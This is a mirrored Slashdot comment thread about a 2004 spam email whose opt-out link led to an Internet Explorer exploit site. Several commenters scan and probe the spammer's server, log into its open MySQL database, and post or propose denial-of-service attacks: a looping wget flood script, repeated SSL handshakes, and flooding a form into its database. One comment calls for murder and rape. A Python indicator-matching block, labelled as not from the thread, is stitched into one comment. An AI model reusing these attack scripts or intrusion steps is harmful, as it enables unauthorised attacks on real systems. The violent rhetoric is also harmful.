Slashdot Mirror


Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site that, when the user scrolls the page, triggers a drag-drop JavaScript exploit. Scarily, the E-mail actually complies with the CAN-SPAM act, as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is being taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in question points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

16 of 327 comments

  1. Use your powers for good by Mignon · · Score: 4, Interesting

    Why don't we non IE-users use the Slashdot effect for good? Let's all visit the evil site and soon it will be a steaming pile of rubble.

  2. interesting ports on the spammer's site by Indy1 · · Score: 5, Interesting

    Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2004-09-22 09:54 MDT
    Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
    (The 1651 ports scanned but not shown below are in state: closed)
    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    135/tcp filtered msrpc
    443/tcp open https
    445/tcp filtered microsoft-ds
    3306/tcp open mysql
    6000/tcp open X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
    1. Re:interesting ports on the spammer's site by TCM · · Score: 3, Interesting

      $ telnet 61.218.79.53 22
      Trying 61.218.79.53...
      Connected to 61-218-79-53.HINET-IP.hinet.net.
      Escape character is '^]'.
      SSH-1.99-OpenSSH_3.5p1


      Hmm.. Isn't 3.5p1 vulnerable to some exploit? Not that I'm implying anything!

      --
      Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
    2. Re:interesting ports on the spammer's site by caluml · · Score: 5, Interesting

      bash-2.05b$ mysql -h 61-218-79-53.HINET-IP.hinet.net
      Welcome to the MySQL monitor. Commands end with ; or \g.
      Your MySQL connection id is 658 to server version: 3.23.54

      Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

      mysql> show databases;
      +-----------------+
      | Database |
      +-----------------+
      | earth_bizzads |
      | herbalmarketing |
      | mysql |
      +-----------------+
      3 rows in set (0.45 sec)

      mysql>

    3. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 3, Interesting

      earth_bizzads
      Interesting, one of the string literals in the downloaded binary is "www.earthlabs.biz/sockproxy/rec.php", a database of infected clients perhaps?

  3. Javascript console by saned · · Score: 2, Interesting

    Firefox's Javascript console reports many errors:

    Error: unterminated string literal Source File: http://focusin.ads.targetnet.com//ad/id=dmitryivanov&opt=hjj&rw=468&rh=60&cv=220&uid=673475 Line: 3, Column: 17 Source Code: document.writeln('

    Error: newPopup has no properties Source File: http://mediamgr.ugo.com/js.ng/Network=ugo&size=1x1&adtype=over&affiliate=ultimate-guitar&suba=ultimate-guitar&channel=music&subchannel=tic&category=tic&PT=ct&CR=ei&pez=tic Line: 11

    Error: document.getElementById("clientcall").click is not a function Source File: http://www.xcelent.biz/o/ Line: 74

    Error: event is not defined Source File: http://www.xcelent.biz/o/frame.html Line: 84

    ...and many more similar to this
    -P@

    --
    signal_connect(0, "test_top.dut.my_sig", "clk");
  4. Slightly OT-Malicious spam opt-outs and MYPOINTS by CdBee · · Score: 3, Interesting

    I received an email from MyPoints asking me to activate an account set up on my Gmail address a few days ago, and hit the CAN-SPAM opt-out link (I hadn't signed up for it).

    Since then I'm getting a LOT of spam, I received none prior. All have the same recipient name as the Mypoints mail and some other common characteristics, but none of the opt-out stuff. Thankfully, gmail is autofiltering them without any need for intervention, but I can't help but feel MyPoints are behind it.

    Has anyone else had the same thing happen?

    --
    I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
  5. Quick .EXE Analysis by terrencefw · · Score: 3, Interesting
    As one other poster pointed out, running 'strings' on the executable reveals it to be 'xProxyBot'.

    Some other strings give a few clues about what it does:

    • Software\Microsoft\Windows\CurrentVersion\Run - It installs itself in the registry.
    • Mozilla/4.0 (compatible) - It grabs stuff off the web and tries to look like IE in the logs.
    • SYSTEM\CurrentControlSet\Control\SafeBoot - Tries to get started in safe mode too.
    It installs itself in Software\Microsoft\Windows\CurrentVersion\Run as 'w32.exe'. I don't see it doing very much though. I've let it loose on a VMWare '98 session. No opened ports (unless it responds to portknocking), no attempts at outbound communication, maybe '98 is too old for it!
    --
    Like tinyurl, but one letter less! http://qurl.co.uk/
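    As an added triage example (not from the thread, and not the poster's own analysis), the indicators quoted in this comment and in the earlier strings/mysql discussion (the Run-key entry 'w32.exe', the SafeBoot key, the bare "Mozilla/4.0 (compatible)" User-Agent, and the earthlabs.biz check-in URL) can be turned into a small Python check over a .reg export and proxy log lines. The .reg text, the log format (client url "user-agent") and all sample values are constructed assumptions.

```python
import re

# Indicators quoted in the thread; sample data below is constructed, not from the page.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
SAFEBOOT_KEY = r"SYSTEM\CurrentControlSet\Control\SafeBoot"
BARE_UA = "Mozilla/4.0 (compatible)"          # no browser/OS tokens at all
CHECKIN_HOST = "www.earthlabs.biz"            # from the binary's string literals

def find_registry_indicators(reg_export: str) -> list:
    """Scan the text of a .reg export for a w32.exe Run entry and SafeBoot writes."""
    hits, current_key = [], None
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1]
            if SAFEBOOT_KEY.lower() in current_key.lower():
                hits.append(("safeboot_key", current_key))
            continue
        if current_key and RUN_KEY.lower() in current_key.lower():
            m = re.match(r'"([^"]+)"\s*=\s*"(.*)"$', line)
            if m and m.group(2).lower().endswith("w32.exe"):
                hits.append(("run_key_w32", m.group(1), m.group(2)))
    return hits

def find_proxy_indicators(log_lines: list) -> list:
    """Flag lines whose UA is exactly the bare token, or that reach the check-in host."""
    hits = []
    for ln in log_lines:
        m = re.match(r'(\S+) (\S+) "([^"]*)"$', ln)   # assumed format: client url "ua"
        if not m:
            continue
        client, url, ua = m.groups()
        if ua == BARE_UA:
            hits.append(("bare_ua", client, url))
        if CHECKIN_HOST in url:
            hits.append(("checkin_url", client, url))
    return hits

# Constructed sample inputs for a stand-alone run.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
"w32"="C:\\WINDOWS\\w32.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\w32]
@="Service"
'''
SAMPLE_LOG = [
    '10.0.0.5 http://www.example.com/ "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '10.0.0.7 http://www.earthlabs.biz/sockproxy/rec.php "Mozilla/4.0 (compatible)"',
    '10.0.0.9 http://www.example.org/news "Mozilla/5.0 (X11; Linux i686) Firefox/0.10"',
]

if __name__ == "__main__":
    print(find_registry_indicators(SAMPLE_REG))
    print(find_proxy_indicators(SAMPLE_LOG))
```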
  6. Can't we just deal with this already by gelfling · · Score: 2, Interesting

    I like a good practical joke as much as the next person. Can we just track down one of these people, drag him/her outside chop them up with bolo knives hunt down their families, rape mutilate and murder them set fire to their houses, kill their dogs and piss all over the corpses already?

    I figure 10, 20 thousand of these losers tops and the problem will go away.

  7. Re:Microsoft says "No Problem" by bheerssen · · Score: 5, Interesting

    Yep, exactly right.

    For the curious, here is an interesting post that describes the exploit at some length. Essentially, it uses an HTML 'dynsrc' attribute (proprietary Microsoft extension) to allow IE to download the executable, and javascript to use the 'shell:' protocol to execute it. It's not a particularly new flaw, but this is the slickest exploit of it I've seen.

    --
    (Score: -1, Stupid)
  8. And people say ICANN is worthless... by miu · · Score: 2, Interesting
    By creating the .biz TLD they created a shyster scum ghetto I can easily ignore.

    Thank you ICANN! :)

    --

    [Set Cain on fire and steal his lute.]
  9. I block all .biz by emptybody · · Score: 2, Interesting

    what, you don't have a .com?
    get over it.

    --
    comment directly in my journal
  10. Fill his database by caffeine_monkey · · Score: 4, Interesting

    It looks like he's not checking the field length of that "email addr" input before inserting it into the DB, so it should be a simple matter for someone to write a script to continuously loop through a POST to http://61.218.79.53/o/cgi-bin/removeme.cgi with a large amount of data in the field name "email". If a few people do this, his DB should fill up pretty quick.

  11. Re:Even better - choose a link with graphics on. by Anonymous Coward · · Score: 1, Interesting

    I'm not the grandparent poster but this one will do the trick. It's unethical but we can't help but to get pissed off at assholes like these once in a while now do we? :P

    #!/bin/sh
    wget --mirror -erobots=off --user-agent=`mcookie` -np https://www.xcelent.biz/d/
    find www.xcelent.biz/ -name *.jpg>urls
    while [ true ]; do
    for i in `cat urls`; do
    wget --user-agent=`mcookie` -O tmp https://$i
    rm tmp
    sleep 1
    done
    done

  12. Use SSL version for maximum effect by Anonymous Coward · · Score: 2, Interesting

    The brain-dead apache admin that put this box together made all the pages available over the SSL connection. So from your browser (preferably Firefox) use this link.

    https://61.218.79.53/d/

    Or if you have OpenSSL on your box (most *nix boxes do or you can download it from www.openssl.org) use this line in your favorite looped script:

    openssl s_client -connect 61.218.79.53:443

    This sets up an SSL connection. Even if they are using a HSM (Hardware Security Module) they cannot service more than 300-400 or so connections/sec with an HSM rated for 600 connections/sec. They aren't using an HSM, so it shouldn't take more than about 50-100 of these per second to fully tax the processor.

  13. Re:devious by interJ · · Score: 2, Interesting
    What patch? This vulnerability affects Win XP SP2 with all updates installed. See here for more info and a harmless demonstration.

    This is a bug that has been known publicly for over a month, but apparently Microsoft have other priorities.